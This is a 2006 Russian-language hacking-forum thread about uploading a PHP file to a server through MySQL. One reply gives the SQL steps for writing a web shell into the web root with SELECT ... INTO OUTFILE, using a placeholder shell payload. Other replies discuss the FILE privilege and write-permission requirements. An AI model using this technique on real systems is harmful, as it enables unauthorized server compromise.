ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу php через MySQL
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

php через MySQL
  #1  
Старый 16.01.2006, 09:38
Аватар для Grema
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию php через MySQL
Как можно залить php файл через MySQL?
Юзаю rst.void sql скрипт...
 
Ответить с цитированием

  #2  
Старый 16.01.2006, 16:43
Аватар для fucker"ok
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию
смотря какие права у тебя есть.
Например
Код:
//Создаём таблицу shell
CREATE TABLE shell (code TEXT NULL);
//вставляем в неё сам код шела
INSERT INTO shell VALUES('<? shell(); ?>');
//выводим шел в файл
SELECT * FROM shell INTO OUTFILE '/home/PATH_TO_WWW/shell.php';
но не факт. Это тоже от много зависит.
 
Ответить с цитированием

  #3  
Старый 17.01.2006, 09:18
Аватар для Grrl
Grrl
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754

Репутация: 97
По умолчанию
прежде всего зависит от того есть ли привилегия file у юзера sql .
если нет то получишь сообщение об ошибке типо аксес денайд фор юзер....и т.п
 
Ответить с цитированием

  #4  
Старый 17.01.2006, 16:49
Аватар для Zadoxlik
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию
Попасть в админку и там поковырять или так как уже тут сказали.
 
Ответить с цитированием

  #5  
Старый 17.01.2006, 16:54
Аватар для fucker"ok
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию
Я не знаю можно ли запретить OUTFILE для самого mysql, но mysql запущен от юзера mysql (покрайне мерее я так делаю, так рекомендует документация). Так что чтобы записать твой пхп код мало знать путь до WWW, нужно ещё иметь папочку с правами на запись для левых юзеров :]
 
Ответить с цитированием

  #6  
Старый 19.01.2006, 17:23
Аватар для Cronyal
Cronyal
Познающий
Регистрация: 07.01.2006
Сообщений: 35
Провел на форуме:
50897

Репутация: 3
По умолчанию
конечно можно. админ мискл может запретить любые команды, даже SELECT)))
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ